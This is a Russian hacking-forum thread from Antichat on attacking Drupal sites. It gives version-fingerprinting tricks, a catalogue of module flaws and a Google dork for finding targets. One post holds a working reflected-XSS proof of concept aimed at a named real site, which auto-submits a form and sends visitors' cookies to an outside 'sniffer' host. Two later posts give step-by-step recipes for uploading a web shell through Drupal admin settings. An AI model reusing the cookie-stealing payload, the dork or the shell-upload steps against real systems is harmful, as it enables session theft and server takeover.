ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2  
Старый 07.04.2008, 16:46
Аватар для Muhacir
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

узнаем версию
http://path/CHANGELOG.txt
 
Ответить с цитированием

  #3  
Старый 22.05.2008, 01:17
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию


отсортировано по убыванию по дате

===================
HIGH

Drupal Meta Tags Module command execution

Обход ограничений безопасности в Drupal
Удаленный пользователь может изменить данные профиля других пользователей.

Drupal Site_Documentation_Module CVE-2008-2271

Drupal Comment Upload Module

===================
SQL-inj

SQL-инъекция в Drupal

SQL-инъекция в vbDrupal

SQL-инъекция в Drupal Acidfree Module

SQL-инъекция в Drupal Extended Tracker

SQL-инъекция в Drupal Easylinks

SQL-инъекция в Drupal Bibliography

SQL-инъекция в Drupal Jobsearch

SQL-инъекция и раскрытии е данных в Drupal

===================
Multy

Множественные уязвимости в vbDrupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Несколько уязвимостей в Drupal

Несколько уязвимостей в Drupal Help Tip

Несколько уязвимостей в Drupal IMCE

===================
CSRF

CSRF атака в Drupal Userpoints Module

CSRF атака в Drupal BUEditor Module

===================
XSS

XSS Drupal Internationalization and Localizer

XSS Drupal E-Publish Module

XSS Drupal Ubercart Module

XSS Drupal Webform Module

XSS Drupal Flickr Module

XSS Multiple Time Sheets

XSS Drupal

XSS Drupal Workflow Module

XSS Drupal Archive Module

XSS Drupal Shoutbox Module

XSS Drupal Token

XSS Drupal Web Links

XSS Drupal Project Issue Tracking Module

XSS Drupal

XSS Drupal LoginToboggan Module

XSS Drupal Project Module

XSS Drupal MySite Module

XSS Drupal Site Profile Directory

XSS Drupal Search Keywords

XSS Drupal Pathauto

XSS Drupal E-commerce

XSS Drupal Easylinks

XSS Drupal Bibliography

XSS Drupal Recipe Module

XSS Drupal

XSS Drupal webform Module

XSS Drupal

XSS Drupal

===================
Module

Drupal Simple Access Module

Drupal Header Image Module
Уязвимость позволяеть получить доступ к административной части приложения.

Drupal Secure Site Module
Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя.

Drupal OpenID Module
Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку.

Drupal Forward Module
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении.

Drupal Print Module
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям.

Drupal Project Issue Tracking Module
Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные.

Drupal Nodefamily Module
Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL.

Drupal Textimage Module
Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе.

Drupal Captcha Module
Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha.

Drupal Pubcookie Module
Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации.

Drupal Form_mail Module
Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.


Последний раз редактировалось Elekt; 22.05.2008 в 01:21..
 
Ответить с цитированием

  #4  
Старый 01.12.2008, 06:16
Аватар для kirufka
kirufka
Новичок
Регистрация: 18.08.2008
Сообщений: 12
Провел на форуме:
39795

Репутация: 0
По умолчанию

вот так версию узнать можно:
Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
define('VERSION', 'ТУТ ВЕРСИЯ');
Если строчки нет, то версия ниже 4.7.0
Дополню пост:
в некоторых модулях написана версия, к примеру:
site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
З.Ы. почему бы не прикрепить тему, тоже нужная вещь

Последний раз редактировалось kirufka; 02.12.2008 в 00:12..
 
Ответить с цитированием

  #5  
Старый 23.02.2009, 22:13
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию

PoC:

<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!--
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script>
--><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263"<!--target--
> method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.
cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>

Google dork: powered by "drupal"; intitle:"powered by drupal"
 
Ответить с цитированием

  #6  
Старый 14.12.2009, 16:21
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Drupal 6.14 - заливка шелла из админпанели

1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration

2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных

3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)

4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)

5) http://drupal.ru/sites/default/files/shell.php3 - шелл

6) Administer->Content management->Удаляем страницу
 
Ответить с цитированием

  #7  
Старый 20.12.2009, 18:31
Аватар для zerg
zerg
Познающий
Регистрация: 05.03.2006
Сообщений: 44
Провел на форуме:
563256

Репутация: 7
По умолчанию

мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
Код:
# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
 
Ответить с цитированием

ещё один способ загрузки шела
  #8  
Старый 04.02.2010, 02:55
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию ещё один способ загрузки шела

ещё один способ загрузки шела:
Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ